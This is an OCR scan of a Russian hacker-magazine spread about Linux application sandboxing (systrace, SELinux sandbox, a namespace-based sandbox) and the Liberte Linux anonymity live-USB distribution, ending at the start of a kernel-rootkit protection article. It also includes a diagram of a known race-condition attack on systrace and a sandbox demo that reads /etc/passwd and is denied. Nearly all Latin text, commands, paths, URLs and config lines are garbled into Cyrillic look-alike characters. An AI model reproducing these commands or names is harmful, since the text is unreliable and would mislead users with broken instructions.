/Ып/Іэ, рісі; 26465(0 )[0] , ро] 
), ргоі : РРОТ.ШНЕ 
Йпзиег ; | 



/Ып/І5. 


Я Неге; 


0, 


едгсэП ; 


/ЬІП/ І5, 


Ті Нега; 


1, 


5Ц5СЗІ 1 ; 


/Ып/ І5, 


ТПІвгз: 


2, 


вувсаіі ; 


/ЬІП/15, 


Шіегз: 


Э, 


зузсэИ : 


/ЬІП/І5, 


Ті Неге; 


4, 


еуесаІІ : 


/Ь і Гі/ 1 5 , 


Ті Неге; 


5. 


вуБсз] 1 : 


/Ып/ І5 , 


ТІНегв; 


б. 


зузсаіі ; 



Ппикб4-Ьгк( 12) , аг 
1 Іпикб4-1егеас1(2і ) , 
Ипцх64-ттар(0) , рг 
1 іпцх64І5Іа1(5) , э 
1іпихб4-с1о&е(Э) , а 

I іпих64-геасІ(Ѳ> , аг 

I I пихб4-трг оіесі ( 1 0 



Отвечать на вопросы зузігасе — довольно скучное занятие 




Графический интерфейс утилиты запсІЬох, основанной 
на идее пространств имен 

обработаетпредставленные ей данные (соде ржи мое/еіс/раззѵѵсі) и 
благополучно запишет их файл Ат р/изегэ благодаря перенаправ- 
лению выходного потока (оно будет осуществлено уже за пределами 
песочницы). Если же мы попытаемся открыть файл /еіс/раззѵѵсі, 
находясь внутри песочницы, ничего не получится: 

$ запсіЪох сиС -сі: -і.1 /еСс/раззж! > /Стр/изегз 

/Ьіп/сиС: /еДс/раззжІ: Регтіззіоп сіепіесі 

Какие-то более серьезные запросы приложения также будут откло- 
нены. И это могло бы свести полезность запббох к нулю, если бы он не 
был основан на БЕЫпих. Дело втом, что политику жестко го ограниче- 
ния, применяемую утилитой, можно изменить и привести кнужному 
нам виду (политика носит имя запсІЬохД:, и ее можно отредактировать 
с помощью простой графической утилиты зузіет-сопбд-зеііпих, 
входящей в состав дистрибутива Еебога). Болеетого, запббох можно 
заставить использовать совершенно другую политику, просто указав 
ее имя в качестве аргумента опции ’-Г. Но это уже для тех, кто разбира- 
ется в БЕЫпих. 



Совсем иначе обстоит дело с графическими приложениями, 
которые запббохтакже умеет вполне безопасно запускать внутри 
песочницы. Для этого предусмотрен флаг '-X', использование ко- 
торого приводит к нескольким коренным изменениям в поведении 
утилиты. Во-первых, происходитзапускХ-сервера Хербуг, кото- 
рый работает внутри уже существующей Х-сессии и используется 
в качестве изолятора запускаемого в песочнице приложения от 
корневого Х-сервера. Внутри Хербуг происходитзапуск менеджера 
окон МаІсЬЬох, который растя гиваетокно приложения на весь экран 
(«экран» только в рамкахХербуг, который сам работает внутри окна 
корневого Х-сервера). Чтобы приложение смогло получить доступ к 
домашнему каталогу и каталогуДтр, но не смогло прочитатьхраня- 
щиеся в них файлы и навредить, предпринимается серия защитных 
действий: 

1. В рамках рандомно выбранного контекста БЕЫпих создаются два 
пустых каталога в $Н0МЕ01Р иАтр. 

2. Происходит запускБЕТІІЮ-угилиты/изг/зЬіп/зеипзЬаге, в качестве 
аргументов которой передаются имена созданных каталогов, Ю кон- 
текста БЕЫпих и имя запускаемой программы. 

3. Утилита зеипзбаге использует пространства имен (те самые, о ко- 
торых мы говорили выше) для монтирования пустых каталогов поверх 
настоящих каталогов $Н0МЕ01Р и Атр. 

4. В новом файловом пространстве имен происходитзапускпрограм- 
мы, которая теперь может обращаться только к виртуальному Х-серве- 
ру и работать с «ненастоящими» каталогами /боте и Дтр. 

Для запуска графических приложений используется несколько иная 
политика БЕЫпих: запс1Ьох_1йе_1, которая открывает возможность 
работы с файлами домашнего каталога и каталога Дтр, хотя во всем 
остальном приложение остается сильно ограниченным в функцио- 
нальности. Если же приложение должно получить доступ к сетевым 
возможностям, его следуетзапускать, указав в качестве политики 
запсі Ьох_ѵѵеЬ_1; (возможность использовать протокол НТТР) или 
запсІЬох_пеМ (полный доступ к сетевым возможностям): 

$ запсіЪох -X -Ъ запс!Ьох_меЪ_Ь ііігеііох доодіе.сот 

Утилита уже включена в состав БЕІіпих и может быть получена путем 
установки пакета зеііпих-роіісу версии не ниже 3.6.1 2 и пакета 
роіісусогеибіз версии не ниже 2.0.62. 
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ЕхрІоіІэЫе гасе 
шіпсіоѵѵ ЬеЕѵѵееп 
т е тогу соріез 



5 уе)аіІ/ 5 уаігасе 

ргесопсіііюл 



кегпеі 



кіѳвг 



Зугіаіі 
соріез іп 
0 . 0 . 00 ; 
ѵаІісШез 
апй 

ассѳрі II. 



ДПаскег 
соріез 
0 . 0 . 0.0 
іпіо 

тетогу 



ЗузіаіІ геріасез I Р 
ѵѵііЬ іэіі аскігезз 
192.166.100.20 



ЬгкЛ) соріез іп 
0 . 0 . 0.0 апй и&ез 
іі іо Ьіпсі зоскеі 



изег 



ІІІННІІ 


ІШЫтЫІІІМІІШЫІЫМІЬ^ЬіШНМІНЫІЫЫІЫНіІіІМІІІЫІь] 

0.0.0.0 


инніѵініііыімыіііыімнінытыііі 

192.168.100.201 


КІИИММІЫІІіІЫІЬІ^ЬіЙІІІІЫНІІЫНІМІІІИМІЫіаіИНІНІіІВІЫІНЫІІИНІ II 

Д 0 .0 .0.0 


Ргосвзб \ѵай5 50ОК 

сусіез оп СРІІ2 і 


АМаскег гезіогез опдіпэі зузіет 
саІІ эгдитзпі о( 0 0.0.0 Ьеіогѳ 
Ыпй() ооруіп гипз 



О том, как ломать ОрепВЗО/ЫеІВЗО-реализацию $у$1гасе, Роберт Ватсон рассказал еще в 2007 году 



Зузігасе — обучаемая песочница 

Несмотря на то, что главным бэкэндом кзузігасе является реали- 
зация механизма «зузіет са II іпіегрозіііоп», доступная в ЫеіВЗО 
и ОрепВЭО, а также в виде патча в Ып их, он вполне нормально 
работает с рігасе-бэкэндом (который хоть и тормозит, но полно- 
стью кроссплатформенный и не страдает от уязвимостей) и может 
предложить пользователям несколько уникальных характеристик, 
недоступных в других системах. 

Главное отличие зузігасе от множества аналогов (втом числе 
запббох) заключается в возможности контролируемого пользова- 
телем самообучения, когда утилита напрямую спрашивает юзера 
о необходимости запрета или разрешения определенныхтипов 
системных вызовов. Это позволяет очень гибко контролировать 
процесс исполнения программы и давать ей только то, что реально 
нужно. Кроме того, это отличный инструмент исследователя, кото- 
рый проще и нагляднее стандартного зігасе. 

В большинстве дистрибутивов Ыпихзузігасе нет, но он поумолчанию 
включен в ОрепВЭО, атакже очень прост в установке из исходников: 

$ зисіо арЦ-деС іпзСаІІ ЪиіІсі-еззепЦіаІ \ 

1іЬеѵепЦ-1 . 4-2 ІіЬеѵепЦ-сІеѵ 

$ ѵ/деС Ы:Цр://ѵ^м.ргоѵоз.огд/ир 1 оа(із/зузЦгасе- 1 .бд.Цаг.д 2 
$ Саг -хгі зузЦгасе-1 . бд . Саг . дг 
$ . /сопіідиге --рге^іх=/изг/1оса1 && таке 
$ зисіо таке іпзкаіі 

Запускать приложения под управлением зузігасе просто. Достаточно 
указать имя программы в качестве аргумента: 

$ зузСгасе 1з 

По умолчанию утилита пытается задействовать возможности графи- 
ческой программы хзузігасе для вывода вопросов на экран. Однако 
хзузігасе не входит в стандартную поставку зузі: га се, поэтому придется 
принудительно заставить утилиту использовать текстовый режим: 



$ зузкгасе -ѣ 1з 

Теперь при каждой попытке выполнить системный вызов подо- 
пытная программа будет остановлена, а на экран выведен вопрос 
о том, стоит ли его запрещать. Ответом может быть достаточно 
сложное условное выражение, учитывающее аргументы систем- 
ного вызова, но для простоты можно использовать слова «регтТ» 
(разрешить) и «бепу» (запретить). 

Понятно, что даже самые простые программы в течение цикла сво- 
ей работы могут выполнить десятки и сотни системных вызовов, и 
будет очень сложно вручную фильтровать их все. 

Поэтому в зузігасе предусмотрен режим «полного доверия», когда 
программа запускается с разрешением всего и генерирует файл 
правил, который затем можно отредактировать, запретив опасные 
системные вызовы —такие, например, какехесП. 

Чтобы запустить зузігасе в этом режиме, достаточно указать флаг 
'-А': 

$ зузкгасе -А 1з 

Файл правил можно найти в каталоге -/.зузігасе: 

$ 1з -1 /Ьоте/з 1т/ . зузкгасе/ 

-гм 1 :1т :1т 631 2011-01-04 12:24 Ып_1з 

Однако надо понимать, что «режим доверия» придуман для того, чтобы 
защитить программы от возможных атак, и для запуска подозритель- 
ного кода он не подходит, в этом случае придется самостоятельно 
запрещать или разрешатьсистемные вызовы по мере выполнения 
программы. 

Пространства имен или запсІЬох-2 

ЭапсІЬох, написанный Стефаном Грабером, — это крохотная утилита 
командной строки, которая использует пространства имен, чтобы за- 
переть подопытное приложение в песочнице. Она выгодно отличает- 
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Роіісу: /Ьіп/ 1 5 і 
І іпихБ4- 
1 іпихбЗ- 
I іпихБ4~ 
1 іпих64~ 
1 іпихБ4- 
Ііпих64" 
1 іпих64- 
1 іпихБ4- 
1 іпихБЗ- 
1 ілихБЗ- 
1 іпих64- 
1 іпихбЗ 
1 іпихБ4- 
1 і пих64— 
1 іпихБ^І— 
1 іпихБЗ- 
НпихБЗ- 
1 іпихБ4- 
1 іпихБ4- 
1 ілих64- 
ііпихБ4- 
1 ілихБ4 




Етиіаііоп: 1іпих64 
Ьг к: регтіі 

Тзгеасі ; ігие ібіеп регтіі 
ттар: регтіі: 
шгііеѵ: регтіі: 
ехіі_дгоир; регтіі 
ізіаі: регтіі 
сіозе; регтіі 
геасі; регтіі 
тргоіесі: регтіі 
агсІ“і„ргсі! : регтіі 
типтар; регтіі 
зеі.іісЗ.асісІгезз: регтіі 
зеі_гоЬизі_1 ізі: регтіі 
іиіех: регтіі 
гі„зідасііоп; регтіі 
гі.зідргостазк: регтіі 
деігіітіі: регтіі 
еіаііз: регтіі 
іосіі; регтіі 

іспіі: стр ед м Р_СэЕТЕ0" ібіеп регтіі 
деіРепіз : регтіі 
шгііе: регтіі 



Автоматически сгенерированный файл правил зузігасе 



ся от всех своих аналогов тем, что вместо запретов использует метод 
виртуализации ресурсов, помещая программу в изолированную 
среду исполнения, которая не соприкасается с основной системой. 
Возможно, это не самый безопасный метод, но он весьма способс- 
твуетудобству использования утилиты, которое сводится просто к 
запуску подопытной программы без необходимости делать правки 
правил в том случае, если программе потребуется какой-то дополни- 
тельный ресурс. 

В сущности, утилита выполняет всего пять простых действий: 

1. Создает новый пустой каталог (назовем его $ЫЕѴѴР00Т) и мон- 
тирует к нему корневой каталог системы в режиме сору-оп-ѵѵгііе 
(для этого используется оверлейная файловая система аиіз). 

2 . Монтирует каталог/боте к $ЫЕѴѴП00Т/боппе. 

3. Создает новое пространство имен для всех возможных ресурсов. 

4 . Подключает ргосіз к каталогу $ЫЕѴѴР00Т/ргос. 

5 . Делает сбгооі в каталог $ЫЕѴѴР00Т и запускает приложение. 

В результате программа оказывается в довольно интересной среде, 
которая внешне похожа на среду обычной системы, но отличается 
от нее тем, что модификация любого файла, за исключением фай- 
лов каталога /боте (хотя это настраивается), будет видна только 
самому приложению. Другие процессы и каналы коммуникации ІРС 
не будут видны из песочницы, а значит, не смогут быть эксплуати- 
рованы. Программа сможет изменить сетевые настройки песочни- 



цы, но эти изменения также не отразятся на основной системе. 
Утилита не включена ни в один дистрибутив, поэтому ее придется 
получать и компилировать самостоятельно: 

$ зисіо арЦ-деЦ іпзкаіі Ъгг 
$ Ъгг ЪгапсЪ. 1р : ~зкдгаЪег/+ ^пк/запсПэох 
$ ссі запсіЬох; шаке 
$ зисіо таке іпзкаіі 

После этого запускаем графический интерфейс за пбЬох-д и і, с по- 
мощью которого можно изменить некоторые настройки песочницы 
(поддержка сети, подключение реальных каталогов /боте и Атр) и 
запустить приложение. Программа требует права суперпользова- 
теля, поэтому придется ввести свой пароль. 

Выводы 

Несмотря на отсутствие единого стандартного интерфейса для 
ограничения приложений в возможностях, Ыпих обладает всем 
необходимым для безопасного запуска приложений в карантине. 
Описанные в статье инструменты — лишьмалая часть того, что 
было создано за многие годы, так что если тебе не приглянулась 
ни одна из систем, всегда можно найти достойную альтернативу. 
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ІЛМІХОЮ 



іѵіпзісІе.ЫодзроІ.сот 



Веб-серфинг ^ 
в шапке-невидимке 



ЫЬегіе Ыпих: ОС для настоящего анонимуса 




• В анонимной работе в интернете уже давно заинтересованы не только 
господа в черных шляпах: нередки случаи, когда обычных 
пользователей привлекали к ответственности всего лишь за нелестный 
комментарий или запись в блоге. Спрос рождает предложение, так что 
сегодня речь пойдет об инструменте достижения анонимности ЫЬегІе 
Ыпих. 



Запили мне ЫЬегіе на 
флешку 

ЫЬегІе Ыпих относится ксемейству 
ЫѵеІІБВ-дистрибутивов, то есть дистрибу- 
тивов, которыеживут на флешках и прочих 
съемных носителях. Это весьма удобно в тех 
случаях, когда требуется быстро развернуть 
среду для (анонимной) работы на посторон- 
нем компьютере, будьто десктоп, ноутбук 
или нетбук без оптического привода. Среди 
ключевых особенностей дистрибутива, 
отличающих его от аналогичных решений, 
стоит отметить следующие: 

• повышенная безопасность системы (так как 
в основе — НагбепесІ бепіоо Ыпих); 

• простота использования; 

• нетребовательность к системным ресурсам; 

• весь сетевой трафик идет через Тог; 

• возможность общаться с другими анони- 
муса ми через скрытые сервисы Тог (опция 



доступна полностью в версии 201 1.1); 

• шифрование всей пользовательской 
информации. 

Несмотря на то, что дистрибутив основан на 
Оепіоо, компилировать ядро и софт не потре- 
буется, а если приспичит собрать из исходни- 
ков, то этот процесс максимально автомати- 
зирован. Образ, который можно записать на 
флешку или 50-карту, уже содержит в себе 
все нужное для работы. В состав дистрибути- 
ва входиттолько легковесное ПО, основан- 
ное на ОТК; минималистичный и быстрый ме- 
неджер окон ОрепЬох; модульный Х-сервер 
с ТгиеТуре шрифтами. Поддерживаются все 
ипісобе-локали и раскладки клавиатур, атак- 
же имеется поддержка виртуальной экран- 
ной клавиатуры. Все приложения собраны 
с использованием инструментария сборки 
проекта НагбепесІ Оепіоо, который включает 
такие патчи, какЭЭР (защита от переполне- 



ния стека и буфера) и А5І_Р (рандомизация 
распределения памяти). Весь необходимый 
для работы софт есть в наличии: 

• Мібогі 0.2.8 — легковесный браузер, осно- 
ванный на движке ѴѴеЬКіІ и тулките 6ТК; 

• Сіаѵѵз Ма іі 3.7.6 — быстрый и легкий 
клиент электронной почты с графическим 
интерфейсом, полностью поддерживающий 
шифрование ОпиРО; 

• Эакига 2.3.8 — эмулятортерминала, осно- 
ванный на ѴТЕ; 

• Аисіасіоиз 2.4.0 — аудиопроигрыватель с 
поддержкой всех распространенных форма- 
тов (трЗ, одд, Нас, аре); 

• 6ІМ0МЕ М ріауег 0.9.9.2 — стандартный для 
окружения ѲІМОМЕ проигрыватель видеофай- 
лов, фронтэнд для тріауег на 6ТК; 

• РСМапЕМ 0.9.7 — файловый менеджер 
с графическим интерфейсом (МібпідЫ 
Сотппапсіегтакже втвоем распоряжении); 
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Если тебя занесет в страны, выделенные чер- 
ным — не забудь прихватить с собой флешку 
с ИЬегіе Ипих: в них интернет-цензура наибо- 
лее жесткая 

• Еѵіпсе 2.30.3 — просмотрщик документов рек (с подде- 
ржкой й^и); 

• АЬіѵѵогсІ 2.8.6, Опитегіс 1 .1 0.6 — офисные приложения с 
поддержкой форматов М іеговой ѴѴогсІ и Ехсеі. 

Для установки дистрибутива нам потребуется архив с 
образом и установочными скриптами (можно скачать с 
официального сайта сІее.зи/ІіЬегІе . либо взять на при- 
лагаемом к журналу диске), а также флешка емкостью не 
менее 256 Мб. Дистрибутив нетребователен нетолько 
ксвободному месту, но и кдругим аппаратным частям. 
Заявляется, что он будет работать на компах с оператив- 
ной памятью 128 Мб и процессорами вплотьдо Репііит 
Рго. 

Рассмотрим установку из Ыпих: 

1. Создаем точку монтирования для флешки:тксііг / 
тесІіа/изЪзЦіск . 

2. Монтируем флешку: шоипС /сІеѵ/зсІМ /тесііа/ 
изЬзСіск . 

3. Распаковываем архив в корневую директорию флешки: 
ипзір ІіЬегСе-2010 . 1 . зір -б. /тебіа/изЪзСіск . 

4. Копируем установочный скрипт на локальный диск: 
ср /тесііа/изЬзЦіск/ІіЬегЦе/зеЦир . зк /Стр/ 
зеСир . зк . 

5. Делаем его исполняемым: сктоб +х /Сшр/зеСир. 
зк . 

6. Размонтируем флешку: игпоипС /беѵ/зсІЫ . 

7. Запускаем скриптустановки: /Сшр/зеСир . зк 

Также для установки понадобится утилита зузііпих версии 
4.02, которая в большинстве случаев устанавливается 
через штатный менеджер пакетов твоего дистрибутива. 

Я использую АгсЬ Ыпих, где на момент написания статьи 
была доступна зузііпих 4.03 — из-за этого пришлось не- 
много отредактировать первые строчки в скрипте: 

$ кеаб -п5 зебир.зк 

# ! /Ьіп/зк -е 

# Установленная версия зузііпих 
зузѵег=4 . 03 

# Путь к шЬг.Ып (можно узнать командой «Гіпб / 
-паше шЬг.Ып») 

зузшЬг=/изг/1іЬ/зуз1іпих/шЬг . Ып 

Установка из ѴѴіпсІоѵѵз более прозаична, нужно лишь 
распаковать содержимое архива на флешку и запустить 
скрипт зеіир.баі с правами администратора. Так как 
утилита зузііпих идетвнутри архива, то ничего дополни- 
тельноустанавливать не нужно. 

ІІ'зеазуІоизе! 

Теперь, указав в ВІОЗ'е приоритетную загрузку со съем- 
ных носителей, можноувидеть окно загрузчика иЬегіе, 




Строгие правила брандмауэра в действии 



где требуется выбрать один из двух режимов загрузки — 
графический или консольный. Графический использует- 
ся в большинстве случаев, а консольный полезен тем, что 
через него можно получить рутовый доступ, переключив- 
шись на второй виртуальный терминал (АІІ+Е2). Правда, 
следует учесть, что после двух минут бездействия рутовая 
консольделаетавтологаут. Там же можно разблокировать 
учетную запись рута командой «изегтосі -II гооі» и изме- 
нить пароль поумолчанию с помощью утилиты раззѵѵсі. 
Воспользовавшись зисіо, мы ограничим свои действия 
всего лишь несколькими командами, поэтому запуск под 
рутом иногда может быть вполне оправдан. 
иЬегіе Ыпих не только дает возможность анонимно- 
го доступа к Сети, но и хранит все пользовательские 
данные в виртуальном зашифрованном разделе ОТЕЕ с 
применением стойкого алгоритма шифрования АЕ5-256 
в режиме ХТ5. Этот раздел в виде файла находится на 
флешке и имеетдинамический размер, который можно 
изменять командой оке-гезіге. Настройки параметров 
зашифрованного раздела могут гибко изменяться под 
нужды пользователя с помощью конфига, представлен- 
ного ниже. 

$ саб /ебс/сопб . б/ІіЪегбе 

# Параметры зашифрованного хранилища 
ОТРЕРІЬЕ=/оЦіе/1іЬегЦе . ѵоі 
ОТЕЕЬАВЕЕ= " ЬіЪегбе ОТЕЕ" 

# Размер хранилища, указывается как часть от 
общего свободного места на носителе (А/В) 

ОТРЕЗ I 2Е= 1 / 4 

# Используемые алгоритм и режим шифрования, 
размер ключа шифрования и алгоритм хеширования 
0ТЕЕСІРНЕК=аез-хбз-р1аіп 

ОТРЕКЕУЗІ2Е=2 5 6 
ОТРЕНАЗН=зка2 5 6 




> СІѴСІ 



На диске, прилагае- 
мом к журналу, лежит 
готовый образ І_іЬегІе 
Ыпих и установочные 
скрипты под Ыпих и 
ѴѴіпсІоѵѵз. 




> іпіо 

• В разделе Іпзіаіі на 
сайте проекта І_іЬегІе 
Ыпих можно найти 
ссылку на торрент с 
образом ѴігІиаІВох 
дистрибутива. 

• Некоторые 
старые компьютеры 
поддерживают 
загрузку только с 
РАТ (16) разделов 
ІІ5В-устройств. 



# Имя раздела ЬѴМ 

# (используется утилитой обіе-гезіге) 
ОТРЕѴОЫІМЕ=обіе 

В случае обострения параноидальных симптомов можно 
зашифровывать отдельные файлы с помощью ОпиРО или 
ЭРА, которые входят в состав дистрибутива. 

Во время первой загрузки нас попросятуказать пароль 
для зашифрованного виртуального раздела ОТЕЕ. При 
каждой последующей загрузке его нужно будет вспоми- 
нать и вводить, иначе система не загрузится. 

Для доступа в сеть используется браузер Мібогі с уже 
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Основное зрІазЬ-лого дистрибутива как бы намекает 



настроенным Тог. Примечательно, что весь разрешенный трафик 
идетчерезТог, что исключаетнепредвиденныеутечки информации 
(например, открытые запросы к 0Ы5-серверу, несмотря на прокси, 
или запросы к ОНСР-серверу, содержащие реальное имя хоста), а 
остальной трафик просто блокируется брандмауэром. В этом можно 
убедиться, набрав «ірІаЫез -І_» под рутом. Пакетный фильтр поумол- 
чанию настроен на блокирование всех входящих и исходящих пакетов 
за исключением трафика ОНСР, О N8, І\ІТР и Тог, причем передава- 
емые поОНСР параметры максимально урезаны, а передача имени 
хоста, АРР и ІРѵ4І_І_ (ІРѵ4 І_іпк-І_осаІ Асісігеззез) — блокируется. 

Для обеспечения приватности в ѴѴі-РІ сетях МАС-адрес беспро- 
водного интерфейса генерируется случайным образом с помощью 
утилиты тас-гапсіоппіге. Так какдля регистрации на некоторыхточ- 
ках доступа необходим прямой вход браузером, в ЫЬегІе предусмот- 
рена возможность отдельного запуска браузера от обособленного 
пользователя, который имеет доступ только кОЫ5 и портам типовых 
сервисов ѵѵеЬ- регистрации. Стоит отметить интересный моментпри 
работе с дистрибутивом: если внезапно наступил шухер, то можно 
просто выдернуть флешку из порта (и съесть), а компьютер через 
несколько секунд выключится сам. 

Сборка из исходников 

ЫЬегІе можно легко собрать из исходников. Для этого подойдетлю- 
бой Ыпих дистрибутив, необязательно быть пользователем Оепіоо. 
Во время сборки оказалось, чтоу меня неустановлен пакет гзупс, 
поэтому пришлось доустановить его и заново запустить процесс. Для 
успешной сборки также необходим пакетЗциазЬРЗ Тооіз 4.1 . Вся 
процедура занимает несколько часов на более-менее современном 
процессоре и требует около 4 Гб свободного места на харде. 



Ргіѵаііх Иѵе-Зузіет 



Разработка суровых немецких анонимусов. Эта система основана на 
ЭеЫап и можетбыть установлена какна СЭ-, таки на ІЭЭВ-устройства. 
Причем установка на ІЭ5В происходиттолько из загруженного ЫѵеСО. В 
дистрибутиве присутствует удобная графическая утилита для шиф- 
рования съемных носителей — ІІзЬСгурІРогтаІ:, а также утилита для 
простого резервного копирования зашифрованных данных СгуріВаскир 
в несколько кликов. Серфинг веба здесь происходит через Рігебох и 
ТогЬиНоп. Система весьма требовательна ксвободному месту — для 
установки требуется как минимум 3 Гб. 




Простые американцы чтут Вторую поправку к Конституции, согласно 
которой самый обычный гражданин может противостоять нагло попи- 
рающему его права государству, зажав купленную в кредит автомати- 
ческую винтовку М-16 водной руке и гамбургер в другой. В мире сетей 
и двоичных кодов неравная расстановка сил в этой милой и наивной 
фантазии внезапно меняется — даже если вездесущему оку электрон- 
ной разведки противостоит простой анонимус втапочках, сжимающий 
флешкуссовременными средствами шифрования в одной ладошке и 
журнал «Хакер» в другой. Именно поэтому ЫЬеііе Ыпих ставит своей 
целью дать юзерам возможность скрыто и безопасно общаться между 
собой в любое время и в любом месте, где есть компьютер с выходом в 
Сеть. Данная функциональность, являющаяся основной для дистрибу- 
тива, реализована в версии 201 1.1, которая, видимо, выйдет к моменту 
публикации статьи. 

На скриншоте видно, что обмен сообщениями в новой версии проис- 
ходитчерез привычный интерфейс программы для отправки почты 
— в данном случае, Сіаѵѵз-Маіі. Для анонимусов, предпочитающих 
удобство общения потаканию паранойе, в релиз включенытакже ІРС- 
клиентХСЬаІи I М-кл иент Рісідіп — с настройками, ориентированными 
на приватностьобщения. Также включены простые средства создания 
тр4- в идео рол и ко в и аудиоклипов в формате Эреех с помощью веб- 
камеры и микрофона. 

Конечно, с визуальнойточки зрения ЫЬеііе уступает более наворочен- 
ным дистрибутивам, в которых можно включатьта кие свистелки, как 
Сотріг. Но главный упор при разработке ЫЬе Не делается на качество 
и надежность работы, а также нетребовательность дистрибутива кже- 
лезу. Анонимус, знай: о тебе заботятся, для тебя делают самое лучшее, 
бесплатно и без СМС. 

Махіт Каттегег<ткгасІее.5и> р автор дистрибутива. 




и'Ьегіе Ыпих 2011.1 



ОетосгаКеу ЫѵеСО 



Дистрибутив был разработан в ответ на ужесточение цензуры в интерне- 
те правительствами Китая и США. Весьма интересный проект, который 
нацелен не столько на анонимность, сколько на сохранность персональ- 
ных и финансовых данных. Автор этого проекта даже предлагает приоб- 
рести уже готовую флешку с этим дистрибутивом и радоваться жизни, а 
также намекает на то, чтобы все заинтересованные быстрее покупали 
его изделие, пока оно еще легально натерритории США. Кроме всего 
прочего, в состав дистрибутива входитантивирусный сканер, который 
может помочь излечить инфицированную винду, расположенную по 
соседству. Среди стандартного арсенала анонимуса: анонимный веб- 
серфингчерезТог, шифрование почты итрафика клиента мгновенных 
сообщений (Рідбіп + ОТВ). 
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Локаль дистрибутива легко поддается изменению (по 
умолчанию — английская) 



Процесс сборки выглядит следующим образом: 

1. Скачиваем исходники (рекомендуется скачивать из 
бѵп, тогда вероятность возникновения проблем при 
сборке меньше): 

зѵп со ЬССрз : / /ІіЪегСе . зѵп . зоигсебогде . пеС/ 
зѵпгооС/ІіЬегСе/Сгипк/ІіЬегСе ІіЬегСе 

2 . Запускаем сборку в папке ДтрДіѵессІ: 

ІіЪегСе-2010 . 1-згс/ЪиіІсІ /Дтр/ Ііѵессі. 

Если по какой-то причине невозможно скачать исходни- 
ки из зѵп, то их можно взять с сервера зоигсеЬгде.пеБ 

$ мдеб ЬССрз : //сісжпіоасіз . зоигсебогде . пеб/ 
ргозесб/ІіЬегбе/2010 . 1/1іЬегбе-2010 . 1-згс . 
баг .Ьз2 

$ баг хз б ІіЬегбе-2010 . 1-згс . баг .Ьз2 
$ гпѵ 1іЬегбе-20ІХ. У-згс ІіЬегбе 

В скрипте ЬшШ поддерживается параметр ітезН, который 
используется для новой сборки дистрибутива. 

На основе исходников ЫЬегІе Біпих можно собрать собс- 
твенный І_іѵеІ)ЗВ-дистрибутив. Список пакетов находится 
вфайлеБгс/ѵаг/ІіЬ/рогбаде/ѵѵогШ — приверженцы более 
«человечных» окружений рабочего стола (или, наоборот, 
более суровыхтайловых менеджеров окон) могутуста- 



Не (Атпезіс) ІпсодпіТо Иѵе 
у$*ет 



Этот проект стал преемником дистрибутива Іпсодпібо 
БіѵеСБ послетого, какавтор объявил об окончании разра- 
ботки. Но, в отличие от Іпсодпгёо 1_іѵеСБ, этот дистрибутив 
может быть за писан как на С 0-диск, та к и на флешку. 
Создатели гарантируют, что, во-первых, все соединения с 
Сетью принудительно происходят через Тог, а во-вторых, 
при работе не остается никаких следов на локальных 
носителях. 

В качестве окружения рабочего стола используется 
6ІЧ0МЕ, а в комплекте идет несметное количество 
СТК-программ (Рігебох, ОрепОІісе, Рідбіп с плагином 
для безопасной передачи сообщений ОТР итакдалее) — 
всего около 2 Гб софта! Благодаря тому, что система рас- 
пространяется в том числе и какобраз ібо, еелегко можно 
запустить на виртуальной машинетипа ѴігІиаІВох. 



новитьихтуда, а также изменить набор интересующего 
софта. Потребуется просто добавить в конфигстрочкус 
нужным названием. Точное название приложений можно 
подсмотреть в дереве портежей по адресу депіоо-рогіаде. 
сот/ЬгоѵѵБе . Все пользовательские настройки находятся 
в/Ьоте/апоп/ и, чтобы лишний раз не мучиться с ихдопи- 
ливанием, можно просто скопировать нужные конфигура- 
ционные файлы из своей домашней директории (если, ко- 
нечно, ты являешься счастливым пользователем линукса). 
Системные настройки, каки полагается, находятся в/еіс. 

Есть куда стремиться 

Тог позволяет клиентам и серверам предоставлять скрытые 
сервисы. То есть можно запустить веб-сервер, 55Н-сервер 
итакдалее, не раскрывая свой ІР-адрес пользователям. 

И, поскольку при этом не используется никакой публич- 
ный адрес, можно запустить скрытый сервис, находясьза 
файерволом. По задумке автора, в процессе первой загруз- 
ки на основе слепка сертификата и сервисного ключа сети 
Тогбудет генерироваться уникальный е-таіі пользователя, 
который в последующем можно будет использовать для 
связи с другими пользователями дистрибутива ЫЬегТе 
через скрытые сервисы Тог. Втекущем релизе (201 0.1 на 
момент написания статьи) данная возможность пока не 
доведена до кондиции, хотя она заявлена как ключевая. 

В ЫЬеііе Ыпих пока нет поддержки набирающей популяр- 
ность сети І2Р (также известной под названием «Проект 
Невидимый Интернет») — анонимной, самоорганизующей- 
ся распределенной сети, которая использует модифициро- 
ванный ОНТКабетІіа, но отличается тем, что хранит в себе 
хешированные адреса узлов сети, зашифрованные АЕ8 
ІР-адреса, атакже публичные ключи шифрования, причем 
соединения по ЫеІѵѵогксІаІаЬаБе тоже зашифрованы. 

Автор дистрибутива открыт для новых идей. Если утебя 
есть предложения по развитию проекта, то их можно 
отсылать на адрес ткйбее.зи . 

Заключение 

Тенденция кужесточению интернет-цензуры в ближай- 
шие годы будет сохраняться, поэтому готовым к этому 
надо быть уже сейчас. Несмотря на мое неприятие поли- 
тики М5 в целом, с одним высказыванием Билла Гейтса 
все же хочется согласиться: свобода слова в Сети рано 
или поздно победит... □с 




> ѵѵагпіпд 

Не стоит забывать, 
что анонимность, 
как и все в нашем 
мире, не бывает 
абсолютной. Поэтому 
ответственность 
за совершенные 
действия рано 
или поздно может 
придти! 
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• бее.Бц/ИЬеНе — 

сайт проекта ЫЬеНе 
Ыпих; 

• атпезіа.Ьоит.огд — 

сайт проекта Т(А)ІІ_5; 

• тапбаіка.пате/ 
ргіѵабх — сайт 
проекта Ргіѵабх І_іѵе- 
Зузіепп; 

• Боигсеіогде.пеі:/ 
рго]есІ5/сІетосгакеу 

— страничка проекта 
БетокгаКеу; 

• І2р2.с1е/іп- 

іго ги.ЫтІ — сайт 
проекта «Невидимый 
Интернет»; 
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РЕШИШШЕО 
П00ТКГГЗ НАСТУПАЮТ! 

Проблемы ОС'ей на нынешнем этапе 
строительства гражданского общества 

©У разработчиков современных операционных систем появилась 
постоянная головная боль. Как защитить ядро системы от 
бездумных действий юзера, которому невдомек, что любая 
запускаемая в системе программа несет в себе потенциальную 
опасность и может лихо скомпрометировать всю имеющуюся 
систему защиты? 



Механизмы защиты 
целостности ядра 

Одна из концепций, которая позволяет поддерживать механизм защи- 
ты ядра, называется «монитор обращений». Монитор контролирует 
и разграничивает доступ к ресурсам системы. В последнее время 
появилось несколько механизмов, позволяющих обеспечить целост- 



ность и защиту ядра от посягательств извне. Основная идея, лежащая 
в основе таких механизмов, заключается в том, что ядро должно быть 
